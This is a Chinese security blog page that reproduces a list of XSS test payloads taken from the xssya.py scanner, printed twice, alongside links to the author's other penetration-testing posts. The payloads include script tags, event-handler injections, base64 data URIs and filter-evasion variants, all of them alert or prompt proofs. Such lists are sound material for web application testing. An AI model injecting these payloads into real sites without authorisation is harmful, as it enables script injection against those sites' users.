j4s0nh4ck
- 浏览: 287822 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
1. 代码来自xssya.py
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<form action=\"Javascript:alert(1)\"><input type=submit>",
"<isindex action=data:text/html, type=image>",
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<body onload=prompt(1);>",
"<q/oncut=open()>",
"<a onmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
"<marquee/onstart=confirm(2)>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<form action=\"Javascript:alert(1)\"><input type=submit>",
"<isindex action=data:text/html, type=image>",
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<body onload=prompt(1);>",
"<q/oncut=open()>",
"<a onmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
"<marquee/onstart=confirm(2)>",
"<A HREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"
分享到:
发表评论
-
linux 安装scrapy
2015-09-07 13:06 601由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 417based on our case, we need to h ... -
wpscan
2015-08-01 10:39 435https://www.digitalocean.com/co ... -
arachni-web-ui使用
2015-06-10 01:04 2146最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 341http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 338解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 452原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 429http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 581原文地址:https://blog.netspi.com/du ... -
[转]Microsoft Access sqli
2015-03-18 00:57 437https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1593https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 671参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 849原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 644http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1972原文地址:http://josipfranjkovic.blo ... -
linux install firefix&plugin
2015-01-22 20:56 4541. download firefox&plugins ... -
Sinatra--超级轻量级web框架
2015-01-17 00:30 661Sinatra是一个超轻量级web框架 介绍:http://w ... -
Shellshock示例
2014-12-19 01:21 318来自:http://pastebin.com/Qbgn09Wa ...
相关推荐
xss payload
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
在本篇文章中,详细列出了各种XSS攻击的payload(有效载荷),这些payload可以被直接使用来实施跨站脚本攻击。下面我将详细介绍这些payload的含义、使用场景和潜在的危害。 1. **基础概念** - **payload**:在XSS...
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss字典-payload
使用 Kali Linux 的字典可以生成大量的 XSS payload,用于测试 XSS 过滤器的检测能力。XSS payload 可以使用各种技术来规避检测,例如使用 Unicode 编码、Base64 编码、JavaScript encode 等。 自动化工具测试 ...
4. **XSS payload生成**:工具可能会提供一些预设的XSS payload模板,供用户根据实际情况进行修改和定制。这些payload可以帮助测试应用程序的易受XSS攻击的点。 5. **实时测试环境**:XSS助手可能还集成了一个简单...
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
在XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
黑名单审计可以检测到一些常见的XSS Payload,但是它并不能检测到所有的XSS Payload。因此,我们需要结合其他检测方法来进行检测。 绕过过滤,触发XSS 在进行存储型XSS测试时,我们需要绕过服务器端的过滤机制,以...
1. **XSS payload生成器**:提供了大量预设的XSS攻击字符串,可以快速生成各种类型的XSS payload,用于测试目标网站的漏洞。 2. **编码解码工具**:包括URL编码、HTML实体编码、Base64编码等,帮助攻击者绕过服务器...
本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")。这关的目的主要是...
1. **XSS盲打**:该功能允许用户输入XSS payload,然后平台会在后台尝试在目标环境中执行这些payload,而不直接显示结果。这对于避免触发网站的防护机制或者防止payload被过滤很有用。 2. **Payload库**:平台可能...
在本节课程中,我们将讨论如何利用 IE 特性绕过 XSS 过滤,并对应不同的 XSS 攻击场景,包括 XSS 漏洞发现、基本 XSS 利用、IE 特性讲解和 Payload 触发 XSS。 XSS 漏洞发现 XSS 漏洞发现是指在目标网站中查找可能...
在实践中,你可以学习到如何发现潜在的注入点,编写有效的XSS payload,以及如何防御这些攻击。 总结,"xss-labs-master.rar" 是一个宝贵的XSS学习资源,它不仅涵盖了XSS的基础理论,还提供了实战经验,对于想要...
XSS Payload 是一种恶意代码,攻击者可以 inject 到 Web 应用程序中,盗窃用户信息或控制用户行为。为了计算 XSS Payload 的长度,我们可以使用 Python 内置函数 len(字符串)来计算对应的字节数。 浏览器审查工具...
4. **漏洞挖掘与利用**:学习如何识别潜在的XSS入口点,理解XSS payload(payload是攻击者注入的恶意代码)的构造和执行机制,以及如何利用这些漏洞进行实际攻击。 5. **防御策略**:除了讲解攻击,资料也可能提供...
2. **高级payload生成器**:提供了大量预定义的XSS payload,可根据目标环境自动生成有效载荷,同时支持自定义payload。 3. **深度分析**:不仅报告漏洞的存在,还能分析漏洞的严重程度,为修复提供指导。 4. **多...
首先,我们来看看"level8.jpg",这可能是一个隐藏的或者用于教学目的的图片,里面可能包含了某种编码或隐藏的XSS payload。图片文件在XSS攻击中不常见,但有时攻击者会利用图片元数据或链接来传递恶意脚本。 接着是...